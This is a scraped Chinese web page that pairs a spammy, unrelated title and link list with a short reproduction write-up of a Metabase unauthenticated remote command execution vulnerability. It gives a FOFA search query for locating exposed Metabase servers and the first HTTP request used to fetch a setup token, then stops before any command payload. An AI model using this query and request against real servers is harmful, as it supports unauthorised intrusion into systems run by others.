当前位置: 首页 > news >正文

桃江县建设局网站天津网站开发学校

桃江县建设局网站,天津网站开发学校,拼多多网站建设,电商网站的支付模块怎么做漏洞描述 Metabase是一款开源数据分析及可视化工具。它可允许用户连接至各种不同类型数据源,未经身份认证的攻击者可利用本漏洞在服务器上以运行 Metabase服务器的权限进行任意命令执行。 免责声明 技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩…

漏洞描述

Metabase是一款开源数据分析及可视化工具。它可允许用户连接至各种不同类型数据源,未经身份认证的攻击者可利用本漏洞在服务器上以运行 Metabase服务器的权限进行任意命令执行。
在这里插入图片描述

免责声明

技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!!

资产确定

fofa:app=“Metabase”

漏洞复现

1.通过GET访问如下获取Token


GET /api/session/properties HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connction: close

http://www.yayakq.cn/news/694921/

相关文章:

  • 合肥网站建设方案托管网站除了wordpress外
  • 网上做论文的网站有哪些内容万全网站建设wl17581
  • 网站开发系统设计钟祥网页设计
  • vps网站目录权限设置舟山高端网站设计
  • 深圳品牌网站建设公司排名wordpress怎么加音乐
  • 新手建站广告联盟赚钱百度seo有用吗
  • 哈尔滨建设局网站电子商务专业就业方向专科
  • 企业自己的网站绍兴企业网站建站模板
  • 建设电子商务网站流程银行收取网站建设费的会计科目
  • 哪些做图片赚钱的网站湖北网站设计
  • 网站301重定向代码学做川菜下什么网站
  • 如何利用源码做网站大连凯杰建设有限公司网站
  • 长沙公司网站模板制作方案网站的 营销渠道的建设
  • 网站首页加载特效网站怎么解析
  • 芯片公司网站建设小白如何制作微信小程序
  • 西安建设高端网站建设银行网站维护
  • 做好的网站怎么发布wordpress 口碑营销主题
  • 安徽住房城乡建设厅网站陕西网站建设排名
  • 专业的网站建设区块链开发工程师招聘
  • 中介网站模板百度指数如何分析
  • 建设银行网站维护电话发布信息的软件
  • 怎么用wordpress 建站seo对网站的重要性
  • 怎么对企业进行网站建设网站搭建公司哪家好
  • 挂机宝做php网站吗专业做卖菜的网站
  • 亚马逊网站首页企业网站建设怎么做
  • 莱芜话题论坛windows优化大师怎么样
  • 怎样创造网站宁波seo推广报价多少
  • 重庆有哪些网站做网站要会写什么
  • 建设网站需要哪个语言编译器卡点视频用什么软件好
  • 建设部执业资格注册中心网站企业官网登录